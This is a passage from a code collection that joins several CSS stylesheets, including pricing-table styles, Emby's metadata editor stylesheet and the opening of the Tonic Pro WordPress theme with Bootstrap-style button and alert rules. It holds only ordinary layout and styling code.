"\e980"; font: 13px 'fontello'; margin-right: 10px; } .pricing-table .list-group-item.unavailable {} .pricing-table ul.list-group > li:nth-child(2n+1) {} .pricing-table .panel-footer { background: none; border: none; } .pricing-table .panel-heading, .pricing-table .panel-body, .pricing-table .pmpro-price .lead, .pricing-table .extra-description {} /* Popular Price Table */ .pricing-table .panel-info.popular { box-shadow: 3px 3px 10px rgba(0, 0, 0, 0.10); } .pricing-table .panel-info.popular .panel-heading { margin-top: -20px; padding-top: 20px; } .pricing-table .panel-info.popular .extra-description { } .pricing-table .popular .panel-heading, .pricing-table .popular .panel-body, .pricing-table .popular .pmpro-price .lead, .pricing-table .popular .extra-description {} .pricing-table .popular .panel-heading h3 { border-bottom-style: solid; border-bottom-width: 1px; } .pricing-table .popular .extra-description { text-transform: uppercase; } /* Google Maps */ .wpb_gmaps_widget .wpb_map_wraper iframe { margin-bottom: 0; padding: 0; display: block; width: 100%; border: none; } .wpb_gmaps_widget.vc_map_responsive .wpb_map_wraper { position: relative; padding-bottom: 56.25%; /* 16:9 */ height: 0; } .wpb_gmaps_widget.vc_map_responsive .wpb_map_wraper iframe { position: absolute; top: 0; left: 0; height: 100%; }
MediaBrowser.WebDashboard/dashboard-ui/css/metadataeditor.css
arcticwaters/Emby
.editorTab { padding-bottom: 200px; } .editPageContent { padding: 0; } .editPageInnerContent { padding: 0 15px 100px; } .editPageName { margin: .5em 0 0; } .editPageSidebar { display: none; } .libraryTree { margin-left: .25em; } .offlineEditorNode { color: #cc3333; } .editorNode img { height: 18px; margin: 0 .35em; vertical-align: middle; position: relative; top: -2px; } .availableImagesList { overflow-y: auto; width: 300px; height: 400px; text-align: center; } .remoteImageContainer { display: inline-block; margin: 8px; vertical-align: top; } .remoteImageDetails { background: #eee; padding: 3px 5px; } .remoteImage { background-position: center bottom; background-repeat: no-repeat; background-size: contain; display: block; /* For the box shadow so that the bottom border isnt underneath the text */ z-index: 100000; position: relative; } .remotePosterImage { width: 150px; height: 225px; } .remoteBackdropImage { width: 272px; height: 153px; } .remoteBannerImage { width: 272px; height: 50px; } .remoteDiscImage { width: 180px; height: 180px; } .editorfieldDescription { color: #ccc; } /* Fixes button running outside of list */ .btnRemoveFromEditorList .ui-btn-inner { padding-right: 0 !important; } .searchImage { background-position: center bottom; background-repeat: no-repeat; background-size: contain; display: block; } .searchBackdropImageContainer { width: 160px; } .searchDiscImageContainer { width: 150px; } .searchPosterImageContainer { width: 140px; } .searchBackdropImageContainer .searchImage { height: 90px; } .searchDiscImageContainer .searchImage { height: 150px; } .searchPosterImageContainer .searchImage { height: 210px; } .searchImageContainer .remoteImageDetails { overflow-x: hidden; text-overflow: ellipsis; } .editorFieldset > div { margin: 1.25em 0; } .jstree-anchor { font-weight: normal !important; } .jstree-wholerow-hovered { background: #38c !important; border-radius: 0 !important; box-shadow: none !important; } .jstree-default .jstree-hovered { background: none !important; border-radius: 0 !important; box-shadow: none !important; color: #fff !important; } .jstree-default .jstree-wholerow-clicked { background: #52B54B !important; } @media all and (min-width: 500px) { .availableImagesList { width: 400px; } } @media all and (min-width: 600px) { .availableImagesList { width: 500px; height: 450px; } .remoteBannerImage { width: 450px; height: 83px; } } .libraryReportIndicator { position: relative; display: block; text-align: center; vertical-align: middle; width: 24px; height: 19px; padding-top: 3px; border-radius: 50%; color: #fff; background: rgb(204, 0, 0); background: rgba(204, 0, 0, .8); } .libraryReportIndicator div:after { background-color: transparent !important; } .clearLibraryReportIndicator { background-color: transparent !important; } .editorTile { display: inline-block; margin: .5em; text-align: center; vertical-align: middle; } .imageEditorTile { width: 256px; background-color: #282828; padding: 0; } .editorTile h3 { text-transform: uppercase; background: #444; padding: .5em 0; text-align: center; margin-top: 0; color: #ddd; } .editorTile p { margin: .5em 0; } .editorTileInner { padding: 1em; } .editorTile .ui-field-contain { margin: 0 0 .5em; } .imageEditorCollapsible .ui-collapsible-content { padding: 0 0 1em 0; } .remoteImage:hover, .searchImageContainer:hover { -moz-box-shadow: 0 0 0 5px #38c; -webkit-box-shadow: 0 0 0 5px #38c; box-shadow: 0 0 0 5px #38c; } .tblLibraryReport img { height: 18px; margin-right: 10px; } .subtitleViewerContent { overflow: auto; width: 200px; height: 200px; } @media all and (min-width: 400px) { .subtitleViewerContent { width: 300px; } } @media all and (min-width: 500px) { .subtitleViewerContent { width: 400px; } } @media all and (min-width: 600px) { .popupIdentify { width: 400px; } .subtitleViewerContent { width: 500px; } } @media all and (min-width: 700px) { .availableImagesList { width: 600px; } .popupIdentify { width: 500px; } .subtitleViewerContent { width: 600px; } } @media all and (min-width: 800px) { .availableImagesList { width: 700px; } .editPageSidebar { position: fixed; top: 54px; bottom: 0; left: 0; width: 30%; display: block; border-right: 1px solid #555; } .editPageInnerContent { float: right; width: 67.5%; } .popupIdentify { width: 600px; } } @media all and (min-width: 900px) { .availableImagesList { width: 800px; } .popupIdentify { width: 700px; } } @media all and (min-width: 1000px) { .availableImagesList { width: 900px; } .popupIdentify { width: 800px; } } @media all and (min-width: 1100px) { .availableImagesList { width: 1000px; } .popupIdentify { width: 900px; } } @media all and (min-width: 1200px) { .availableImagesList { width: 1100px; } .popupIdentify { width: 1000px; } } @media all and (min-width: 1300px) { .availableImagesList { width: 1200px; } } @media all and (min-width: 1400px) { .availableImagesList { width: 1300px; } } @media all and (min-width: 1500px) { .availableImagesList { width: 1400px; } } @media all and (min-width: 1800px) { .editPageSidebar { width: 25%; } .editPageInnerContent { width: 72.5%; } } .popupIdentify form, .identificationSearchResults { overflow-y: auto; } .collectionItemSearchResults { max-height: 65%; overflow-y: auto; } @media all and (min-height: 500px) { .popupIdentify form, .identificationSearchResults { height: 350px; } .subtitleViewerContent { height: 400px; } } @media all and (min-height: 600px) { .popupIdentify form, .identificationSearchResults { height: 450px; } .collectionItemSearchResults { max-height: 70%; } .subtitleViewerContent { height: 500px; } } @media all and (min-height: 700px) { .popupIdentify form, .identificationSearchResults { height: 550px; } .collectionItemSearchResults { max-height: 75%; } .subtitleViewerContent { height: 600px; } } @media all and (min-height: 800px) { .availableImagesList { height: 600px; } .popupIdentify form, .identificationSearchResults { height: 600px; } .collectionItemSearchResults { max-height: 80%; } } @media all and (min-height: 900px) { .availableImagesList { height: 700px; } .popupIdentify form, .identificationSearchResults { height: 700px; } }
wp-content/themes/tonic-pro/style.css
nicolasdeker/babyromandie
/* Theme Name: Tonic Pro Theme URI: https://themes.bavotasan.com/2013/tonic/ Author: c.bavota Author URI: http://bavotasan.com/ Description: Create a truly unique design with Tonic Pro, a lightweight and fully responsive HTML5 theme based on the Gridiculous boilerplate. Use the new Theme Options customizer to add own header image, custom background, page layout, site width and more. Distinguish each post with one of the eight supported post formats, such as: Video, Image, Aside, Status, Audio, Quote, Link and Gallery. Install JetPack to display each of your galleries through a tiled view and jQuery carousel. Compatible with bbPress & BuddyPress. Built using SASS, Compass and Twitter Bootstrap. Includes 20 Google Fonts for improved typeface readability and works perfectly in desktop browsers, tablets and handheld devices. For a live demo go to http://demos.bavotasan.com/tonic-pro/. Version: 1.0.2 Tags: white, black, gray, light, silver, one-column, two-columns, right-sidebar, left-sidebar, flexible-width, custom-background, custom-header, custom-menu, custom-colors, editor-style, featured-image-header, featured-images, post-formats, sticky-post, threaded-comments, translation-ready, full-width-template, theme-options License: GNU General Public License v3.0 License URI: http://www.gnu.org/licenses/gpl-3.0.html Tonic Pro WordPress Theme, Copyright 2013 c.bavota Tonic Pro is distributed under the terms of the GNU GPL */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; padding: 0; border: 0; font: inherit; font-size: 100%; vertical-align: baseline; } html { line-height: 1; } ol, ul { list-style: none; } table { border-collapse: collapse; border-spacing: 0; } caption, th, td { text-align: left; font-weight: normal; vertical-align: middle; } q, blockquote { quotes: none; } q:before, q:after, blockquote:before, blockquote:after { content: ""; content: none; } a img { border: none; } article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section, summary { display: block; } /* =Gridiculous -------------------------------------------------------------- */ .grid { margin: 0 auto; max-width: 1200px; min-width: 320px; width: 100%; } img { max-width: 100%; height: auto; } .wfull, .c12 { width: 100%; max-width: 100%; } .w320 { max-width: 320px; } .w640 { max-width: 640px; } .w960 { max-width: 960px; } .row { width: 100%; margin-bottom: 20px; } .row .row { width: auto; margin-left: -20px; margin-right: -20px; } @media (max-width: 960px) { .row .row .c1, .row .row .c2, .row .row .c3, .row .row .c4, .row .row .c5, .row .row .c6, .row .row .c7, .row .row .c8, .row .row .c9, .row .row .c10, .row .row .c11, .row .row .c12 { width: 100%; margin-bottom: 20px; } } @media (max-width: 960px) { .row .row > div:last-child { margin-bottom: 0; } } .c1 { width: 8.33%; } .c2 { width: 16.66%; } .c3 { width: 25%; } .c4 { width: 33.33%; } .c5 { width: 41.66%; } .c6 { width: 50%; } .c7 { width: 58.33%; } .c8 { width: 66.66%; } .c9 { width: 75%; } .c10 { width: 83.33%; } .c11 { width: 91.66%; } .w320 .c1, .w320 .c2, .w320 .c3, .w320 .c4, .w320 .c5, .w320 .c6, .w320 .c7, .w320 .c8, .w320 .c9, .w320 .c10, .w320 .c11, .w640 .c1, .w640 .c2, .w640 .c3, .w640 .c4, .w640 .c5, .w640 .c6, .w640 .c7, .w640 .c8, .w640 .c9, .w640 .c10, .w640 .c11 { width: 100%; } .s1 { margin-left: 8.33%; } .s2 { margin-left: 16.66%; } .s3 { margin-left: 25%; } .s4 { margin-left: 33.33%; } .s5 { margin-left: 41.66%; } .s6 { margin-left: 50%; } .s7 { margin-left: 58.33%; } .s8 { margin-left: 66.66%; } .s9 { margin-left: 75%; } .s10 { margin-left: 83.33%; } .s11 { margin-left: 91.66%; } .end { float: right !important; } .c1, .c2, .c3, .c4, .c5, .c6, .c7, .c8, .c9, .c10, .c11, .c12 { min-height: 1px; float: left; padding-left: 20px; padding-right: 20px; position: relative; } @media (max-width: 768px) { .c1, .c2, .c3, .c4, .c5, .c6, .c7, .c8, .c9, .c10, .c11, .c12 { width: 100%; margin-right: 0; margin-left: 0; margin-bottom: 20px; } } /* =Clearfix http://css-tricks.com/snippets/css/clear-fix/ -------------------------------------------------------------- */ .row:after, .clearfix:after { content: ""; display: table; clear: both; } /* =General -------------------------------------------------------------- */ * { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; word-wrap: break-word; outline: none; } body { font-size: 16px; line-height: 1.4; } h1, h2, h3, h4, h5, h6 { line-height: 1.1; margin: 20px 0; text-rendering: optimizelegibility; } .basic h1, .basic h2, .basic h3, .basic h4, .basic h5, .basic h6 { color: #333333; font-family: Lato, sans-serif; font-weight: normal; } h1 a, h2 a, h3 a, h4 a, h5 a, h6 a { text-decoration: none; } .basic h1 a, .basic h2 a, .basic h3 a, .basic h4 a, .basic h5 a, .basic h6 a { color: #333333; } h1 { font-size: 30px; } h2 { font-size: 26px; } h3 { font-size: 24px; } h4 { font-size: 22px; } h5 { font-size: 20px; } h6 { font-size: 18px; } p { margin: 1em 0; } a { text-decoration: none; } .basic a { color: #0088CC; } .basic a:hover { color: #444; } img { width: auto\9; height: auto; max-width: 100%; vertical-align: middle; border: 0; -ms-interpolation-mode: bicubic; } ul, ol { padding: 0 0 0 20px; } ul { list-style: disc; } ol { list-style: decimal; } table { width: 100%; background: #fff; } table td, table th { padding: 8px; border: 1px solid #bbb; text-align: left; } table th { background: #ddd; font-weight: bold; } table caption { padding: 1em 0; text-align: center; } dt { font-weight: bold; } dd { line-height: 1.4; margin: 4px 0 0; padding: 0 0 .5em 0; } blockquote { margin: 1em 0; border-left: 10px solid #ccc; padding-left: 12px; } cite { text-align: right; font-style: normal; display: block; } cite:before { content: '\2013 \00A0'; } pre, code { -webkit-border-radius: 3px; -moz-border-radius: 3px; -ms-border-radius: 3px; -o-border-radius: 3px; border-radius: 3px; font: 0.8em 'Andale Mono', 'Lucida Console', monospace; background: #f2f2f2; border: 1px solid #e6e6e6; color: #888; padding: 2px 4px; } pre { white-space: pre; word-wrap: normal; overflow-x: scroll; line-height: 1.3; margin: 1em 0; } select { width: 100%; } .fl { float: left; } .fr { float: right; } del { color: red; text-decoration: line-through; } ins { border-bottom: 1px solid green; text-decoration: none; color: green; } em, i { font-style: italic; } strong, b { font-weight: bold; } sup, sub { line-height: 0; } abbr, acronym { border-bottom: 1px dotted; } address { margin: 0 0 1.5em; font-style: italic; } /* =Inputs -------------------------------------------------------------- */ input, textarea { -webkit-border-radius: 6px; -moz-border-radius: 6px; -ms-border-radius: 6px; -o-border-radius: 6px; border-radius: 6px; padding: 8px; border: 1px solid #bbb; font-size: 14px; color: #555; } input:focus, textarea:focus { -webkit-box-shadow: 2px 2px 4px rgba(0, 0, 0, 0.4); -moz-box-shadow: 2px 2px 4px rgba(0, 0, 0, 0.4); box-shadow: 2px 2px 4px rgba(0, 0, 0, 0.4); border-color: #AAA; } input[type=text], input[type=password], input[type=email], input[type=url], input[type=number] { width: 240px; } input[type="submit"] { margin-top: 0; } textarea { width: 100%; } select { display: inline-block; height: 28px; line-height: 1; border: 1px solid #aaa; padding: 4px; color: #555; } .widget select { width: 70%; } /* =Media -------------------------------------------------------------- */ video { max-width: 100%; height: auto; } audio, canvas, video { display: inline-block; *display: inline; *zoom: 1; } audio:not([controls]) { display: none; } /* =Assitive Text -------------------------------------------------------------- */ .assistive-text, .remove, .screen-reader-text { position: absolute !important; clip: rect(1px 1px 1px 1px); /* IE6, IE7 */ clip: rect(1px, 1px, 1px, 1px); } /* =Sticky Footer -------------------------------------------------------------- */ html, body { height: 100%; } #page { min-height: 100%; height: auto !important; height: 100%; margin: 0 auto 0; } #main { margin-bottom: 0; } /* =Twitter Bootstrap Shortcodes -------------------------------------------------------------- */ input[type="submit"], .btn { text-decoration: none; display: inline-block; *display: inline; padding: 4px 14px; margin-bottom: 0; *margin-left: .3em; font-size: 14px; line-height: 20px; *line-height: 20px; color: #333; text-align: center; text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75); vertical-align: middle; cursor: pointer; background-color: #f5f5f5; *background-color: #e6e6e6; background-image: -webkit-gradient(linear, 0 0, 0 100%, from(white), to(#e6e6e6)); background-image: -webkit-linear-gradient(top, white, #e6e6e6); background-image: -o-linear-gradient(top, white, #e6e6e6); background-image: linear-gradient(to bottom, #ffffff, #e6e6e6); background-image: -moz-linear-gradient(top, white, #e6e6e6); background-repeat: repeat-x; border: 1px solid #bbb; *border: 0; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); border-color: #e6e6e6 #e6e6e6 #bfbfbf; border-bottom-color: #a2a2a2; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; filter: progid:dximagetransform.microsoft.gradient(startcolorstr='#ffffffff',endcolorstr='#ffe6e6e6',gradienttype=0); filter: progid:dximagetransform.microsoft.gradient(enabled=false); *zoom: 1; -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05); -moz-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05); box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05); } input[type="submit"]:hover, input[type="submit"]:active, .btn:hover, .btn:active, .btn.active, .btn.disabled, .btn[disabled] { color: #333; background-color: #e6e6e6; *background-color: #d9d9d9; } input[type="submit"]:active, .btn:active, .btn.active { background-color: #ccc \9; } .btn:first-child { *margin-left: 0; } input[type="submit"]:hover, .btn:hover { color: #333; text-decoration: none; background-color: #e6e6e6; *background-color: #d9d9d9; background-position: 0 -15px; -webkit-transition: background-position .1s linear; -moz-transition: background-position .1s linear; -o-transition: background-position .1s linear; transition: background-position .1s linear; } input[type="submit"]:focus, .btn:focus { outline: thin dotted #333; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } input[type="submit"]:active, .btn.active, .btn:active { background-color: #e6e6e6; background-color: #d9d9d9 \9; background-image: none; outline: 0; -webkit-box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.15), 0 1px 2px rgba(0, 0, 0, 0.05); -moz-box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.15), 0 1px 2px rgba(0, 0, 0, 0.05); box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.15), 0 1px 2px rgba(0, 0, 0, 0.05); } .btn.disabled, .btn[disabled] { cursor: default; background-color: #e6e6e6; background-image: none; opacity: .65; filter: alpha(opacity=65); -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } .btn-large { padding: 9px 14px; font-size: 16px; line-height: normal; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; } .btn-large[class^="icon-"] { margin-top: 2px; } .btn-small { padding: 3px 9px; font-size: 12px; line-height: 18px; } .btn-small[class^="icon-"] { margin-top: 0; } .btn-mini { padding: 2px 6px; font-size: 11px; line-height: 17px; } .btn-block { display: block; width: 100%; padding-right: 0; padding-left: 0; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .btn-block + .btn-block { margin-top: 5px; } input[type="submit"].btn-block, input[type="reset"].btn-block, input[type="button"].btn-block { width: 100%; } .btn-primary.active, .btn-warning.active, .btn-danger.active, .btn-success.active, .btn-info.active, .btn-inverse.active { color: rgba(255, 255, 255, 0.75); } input[type="submit"], .btn { border-color: #c5c5c5; border-color: rgba(0, 0, 0, 0.15) rgba(0, 0, 0, 0.15) rgba(0, 0, 0, 0.25); } .btn-primary { color: #fff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #006dcc; *background-color: #04c; background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#0088cc), to(#0044cc)); background-image: -webkit-linear-gradient(top, #0088cc, #0044cc); background-image: -o-linear-gradient(top, #0088cc, #0044cc); background-image: linear-gradient(to bottom, #0088cc, #0044cc); background-image: -moz-linear-gradient(top, #0088cc, #0044cc); background-repeat: repeat-x; border-color: #04c #04c #002a80; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); filter: progid:dximagetransform.microsoft.gradient(startcolorstr='#ff0088cc',endcolorstr='#ff0044cc',gradienttype=0); filter: progid:dximagetransform.microsoft.gradient(enabled=false); } .btn-primary:hover, .btn-primary:active, .btn-primary.active, .btn-primary.disabled, .btn-primary[disabled] { color: #ffffff; background-color: #04c; *background-color: #003bb3; } .btn-primary:active, .btn-primary.active { background-color: #039 \9; } .btn-warning { color: #fff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #faa732; *background-color: #f89406; background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#fbb450), to(#f89406)); background-image: -webkit-linear-gradient(top, #fbb450, #f89406); background-image: -o-linear-gradient(top, #fbb450, #f89406); background-image: linear-gradient(to bottom, #fbb450, #f89406); background-image: -moz-linear-gradient(top, #fbb450, #f89406); background-repeat: repeat-x; border-color: #f89406 #f89406 #ad6704; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); filter: progid:dximagetransform.microsoft.gradient(startcolorstr='#fffbb450',endcolorstr='#fff89406',gradienttype=0); filter: progid:dximagetransform.microsoft.gradient(enabled=false); } .btn-warning:hover, .btn-warning:active, .btn-warning.active, .btn-warning.disabled, .btn-warning[disabled] { color: #ffffff; background-color: #f89406; *background-color: #df8505; } .btn-warning:active, .btn-warning.active { background-color: #c67605 \9; } .btn-danger { color: #fff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #da4f49; *background-color: #bd362f; background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ee5f5b), to(#bd362f)); background-image: -webkit-linear-gradient(top, #ee5f5b, #bd362f); background-image: -o-linear-gradient(top, #ee5f5b, #bd362f); background-image: linear-gradient(to bottom, #ee5f5b, #bd362f); background-image: -moz-linear-gradient(top, #ee5f5b, #bd362f); background-repeat: repeat-x; border-color: #bd362f #bd362f #802420; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); filter: progid:dximagetransform.microsoft.gradient(startcolorstr='#ffee5f5b',endcolorstr='#ffbd362f',gradienttype=0); filter: progid:dximagetransform.microsoft.gradient(enabled=false); } .btn-danger:hover, .btn-danger:active, .btn-danger.active, .btn-danger.disabled, .btn-danger[disabled] { color: #ffffff; background-color: #bd362f; *background-color: #a9302a; } .btn-danger:active, .btn-danger.active { background-color: #942a25 \9; } .btn-success { color: #fff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #5bb75b; *background-color: #51a351; background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#62c462), to(#51a351)); background-image: -webkit-linear-gradient(top, #62c462, #51a351); background-image: -o-linear-gradient(top, #62c462, #51a351); background-image: linear-gradient(to bottom, #62c462, #51a351); background-image: -moz-linear-gradient(top, #62c462, #51a351); background-repeat: repeat-x; border-color: #51a351 #51a351 #387038; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); filter: progid:dximagetransform.microsoft.gradient(startcolorstr='#ff62c462',endcolorstr='#ff51a351',gradienttype=0); filter: progid:dximagetransform.microsoft.gradient(enabled=false); } .btn-success:hover, .btn-success:active, .btn-success.active, .btn-success.disabled, .btn-success[disabled] { color: #ffffff; background-color: #51a351; *background-color: #499249; } .btn-success:active, .btn-success.active { background-color: #408140 \9; } .btn-info { color: #fff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #49afcd; *background-color: #2f96b4; background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#5bc0de), to(#2f96b4)); background-image: -webkit-linear-gradient(top, #5bc0de, #2f96b4); background-image: -o-linear-gradient(top, #5bc0de, #2f96b4); background-image: linear-gradient(to bottom, #5bc0de, #2f96b4); background-image: -moz-linear-gradient(top, #5bc0de, #2f96b4); background-repeat: repeat-x; border-color: #2f96b4 #2f96b4 #1f6377; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); filter: progid:dximagetransform.microsoft.gradient(startcolorstr='#ff5bc0de',endcolorstr='#ff2f96b4',gradienttype=0); filter: progid:dximagetransform.microsoft.gradient(enabled=false); } .btn-info:hover, .btn-info:active, .btn-info.active, .btn-info.disabled, .btn-info[disabled] { color: #ffffff; background-color: #2f96b4; *background-color: #2a85a0; } .btn-info:active, .btn-info.active { background-color: #24748c \9; } .btn-inverse { color: #fff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #363636; *background-color: #222; background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#444444), to(#222222)); background-image: -webkit-linear-gradient(top, #444444, #222222); background-image: -o-linear-gradient(top, #444444, #222222); background-image: linear-gradient(to bottom, #444444, #222222); background-image: -moz-linear-gradient(top, #444444, #222222); background-repeat: repeat-x; border-color: #222 #222 #000; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); filter: progid:dximagetransform.microsoft.gradient(startcolorstr='#ff444444',endcolorstr='#ff222222',gradienttype=0); filter: progid:dximagetransform.microsoft.gradient(enabled=false); } .btn-inverse:hover, .btn-inverse:active, .btn-inverse.active, .btn-inverse.disabled, .btn-inverse[disabled] { color: #ffffff; background-color: #222; *background-color: #151515; } .btn-inverse:active, .btn-inverse.active { background-color: #080808 \9; } button.btn, input[type="submit"].btn, input[type="submit"] { *padding-top: 3px; *padding-bottom: 3px; } button.btn::-moz-focus-inner, input[type="submit"].btn::-moz-focus-inner, input[type="submit"]::-moz-focus-inner { padding: 0; border: 0; } button.btn.btn-large, input[type="submit"].btn.btn-large { *padding-top: 7px; *padding-bottom: 7px; } button.btn.btn-small, input[type="submit"].btn.btn-small { *padding-top: 3px; *padding-bottom: 3px; } button.btn.btn-mini, input[type="submit"].btn.btn-mini { *padding-top: 1px; *padding-bottom: 1px; } .btn-link, .btn-link:active, .btn-link[disabled] { background-color: transparent; background-image: none; -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } .btn-link { color: #08c; cursor: pointer; border-color: transparent; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .btn-link:hover { color: #005580; text-decoration: underline; background-color: transparent; } .btn-link[disabled]:hover { color: #333; text-decoration: none; } .alert { font: 12px/1.4 normal Arial, sans-serif; padding: 8px 35px 8px 14px; margin-bottom: 20px; color: #c09853; text-shadow: 0 1px 0 rgba(255, 255, 255, 0.5); background-color: #fcf8e3; border: 1px solid #fbeed5; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .alert h4 { font-size: 16px; color: inherit; font-family: inherit; } .alert .close { position: relative; top: -2px; right: -21px; line-height: 20px; } .alert-success { color: #468847; background-color: #dff0d8; border-color: #d6e9c6; } .alert-danger, .alert-error { color: #b94a48; background-color: #f2dede; border-color: #eed3d7; } .alert-info { color: #3a87ad; background-color: #d9edf7; border-color: #bce8f1; } .alert-block { padding-top: 14px; padding-bottom: 14px; } .alert-block > p, .alert-block > ul { margin-bottom: 0; } .alert-block p + p { margin-top: 5px; } .alert p, .alert h4 { margin: 0; } .alert a { color: inherit; text-decoration: none; border-bottom: 1px dotted; } .alert a:hover { color: inherit; } .alert code { font-size: 11px; } .label, .badge { font-size: 11.844px; font-weight: 700; line-height: 14px; color: #fff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); white-space: nowrap; vertical-align: baseline; background-color: #999; } .label { padding: 1px 4px 2px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .badge { padding: 1px 9px 2px; -webkit-border-radius: 9px; -moz-border-radius: 9px; border-radius: 9px; } a.label:hover, a.badge:hover { color: #fff; text-decoration: none; cursor: pointer; } .label-important, .badge-important { background-color: #b94a48; } .label-important[href], .badge-important[href] { background-color: #953b39; } .label-warning, .badge-warning { background-color: #f89406; } .label-warning[href], .badge-warning[href] { background-color: #c67605; } .label-success, .badge-success { background-color: #468847; } .label-success[href], .badge-success[href] { background-color: #356635; } .label-info, .badge-info { background-color: #3a87ad; } .label-info[href], .badge-info[href] { background-color: #2d6987; } .label-inverse, .badge-inverse { background-color: #333; } .label-inverse[href], .badge-inverse[href] { background-color: #1a1a1a; } .hero-unit { padding: 60px; margin-bottom: 30px; font-size: 18px; font-weight: 200; line-height: 30px; color: inherit; background-color: #eeeeee; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .hero-unit h1 { margin: 10px 0 0; font-size: 60px; line-height: 1; letter-spacing: -1px; color: inherit; } .hero-unit li { line-height: 30px; } .hero-unit p { margin: 0 0 10px; } .img-rounded, .img-polaroid, .img-circle, .gallery-icon img { padding: 0; border: 0; background: none; } .img-rounded { -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .img-polaroid, .gallery-icon img { padding: 4px; background-color: #fff; border: 1px solid #ccc; border: 1px solid rgba(0, 0, 0, 0.2); -webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1); -moz-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1); box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1); } .img-circle { -webkit-border-radius: 500px; -moz-border-radius: 500px; border-radius: 500px; } .btn-group { position: relative; display: inline-block; *display: inline; *margin-left: .3em; font-size: 0; white-space: nowrap; vertical-align: middle; *zoom: 1; } .btn-group:first-child { *margin-left: 0; } .btn-group + .btn-group { margin-left: 5px; } .btn-toolbar { margin-top: 10px; margin-bottom: 10px; font-size: 0; } .btn-toolbar > .btn + .btn, .btn-toolbar > .btn-group + .btn, .btn-toolbar > .btn + .btn-group { margin-left: 5px; } .btn-group > .btn { position: relative; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .btn-group > .btn + .btn { margin-left: -1px; } .btn-group > .btn, .btn-group > .dropdown-menu, .btn-group > .popover { font-size: 14px; } .btn-group > .btn-mini { font-size: 10.5px; } .btn-group > .btn-small { font-size: 11.9px; } .btn-group > .btn-large { font-size: 17.5px; } .btn-group > .btn:first-child { margin-left: 0; -webkit-border-bottom-left-radius: 4px; border-bottom-left-radius: 4px; -webkit-border-top-left-radius: 4px; border-top-left-radius: 4px; -moz-border-radius-bottomleft: 4px; -moz-border-radius-topleft: 4px; } .btn-group > .btn:last-child, .btn-group > .dropdown-toggle { -webkit-border-top-right-radius: 4px; border-top-right-radius: 4px; -webkit-border-bottom-right-radius: 4px; border-bottom-right-radius: 4px; -moz-border-radius-topright: 4px; -moz-border-radius-bottomright: 4px; } .btn-group > .btn.large:first-child { margin-left: 0; -webkit-border-bottom-left-radius: 6px; border-bottom-left-radius: 6px; -webkit-border-top-left-radius: 6px; border-top-left-radius: 6px; -moz-border-radius-bottomleft: 6px; -moz-border-radius-topleft: 6px; } .btn-group > .btn.large:last-child, .btn-group > .large.dropdown-toggle { -webkit-border-top-right-radius: 6px; border-top-right-radius: 6px; -webkit-border-bottom-right-radius: 6px; border-bottom-right-radius: 6px; -moz-border-radius-topright: 6px; -moz-border-radius-bottomright: 6px; } .btn-group > .btn:hover, .btn-group > .btn:focus, .btn-group > .btn:active, .btn-group > .btn.active { z-index: 2; } .btn-group .dropdown-toggle:active, .btn-group.open .dropdown-toggle { outline: 0; } 